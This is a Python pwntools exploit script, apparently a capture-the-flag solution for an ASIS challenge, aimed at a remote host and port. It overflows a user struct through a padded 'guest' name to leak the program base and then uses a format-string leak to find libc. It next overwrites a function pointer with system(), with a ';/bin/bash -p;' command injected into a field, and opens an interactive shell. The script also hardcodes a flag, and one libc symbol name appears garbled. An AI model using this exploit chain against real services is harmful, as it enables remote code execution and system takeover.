from pwn import *

# context.log_level = 'debug'
p = remote('185.106.120.220', 1337)

p.sendline('admin')
p.sendline('ASIS{304b0f16eb430391c6c86ab0f3294211}')

p.sendline('2')
p.sendline('3')

p.sendline('2')
p.sendline('3')

p.sendline('5')
p.sendline('3')

p.sendline('8')

struct_leak  = p32(1) # id
struct_leak += p8(1) # used
struct_leak += "X"*(107+16)
p.sendline('guest'+"A"*10)
p.sendline('guest'+"A"*(0x8b)+struct_leak)
p.sendline('3')
p.sendline('')
p.sendline('8')

p.readuntil('XXXXXu')
base_text = u64(("u" + p.readuntil(', pr')[:-4]).ljust(8, '\x00')) - 0x1275
log.info('base txt addr = 0x%x' % base_text)

struct_leak  = "XXXX"
struct_leak += p8(1) # used
struct_leak += "%33$p"+"X"*(95)
struct_leak += p8(1)
struct_leak += "A"*6
struct_leak += "B"*16
struct_leak += p64(base_text+0xDA0)
p.sendline('guest'+"A"*100)
p.sendline('guest'+"A"*(0x8b)+struct_leak)
p.sendline('3')
p.sendline('2')
p.sendline('8')

p.readuntil('? XXXX\x01')
libc_start_main_240 = int(p.readuntil('X')[:-1], 16)

e = ELF('libc.so.6')
offset_libc_start_main = e.symbols['%%_%%libc_start_main']
offset_system = e.symbols['system']

base_libc = libc_start_main_240-240-offset_libc_start_main-5
log.info('base libc = 0x%x' % base_libc)


what = ";/bin/bash -p;"

struct_system  = "ls  "
struct_system += p8(1) # used
struct_system += what + "I"*(100 - len(what))
struct_system += p8(1)
struct_system += "A"*6
struct_system += "B"*16
struct_system += p64(base_libc+offset_system)
p.sendline('guest'+"A"*100)
p.sendline('guest'+"A"*(0x8b)+struct_system)
p.sendline('3')
p.sendline('2')

log.info("enjoy your shell.")

p.interactive()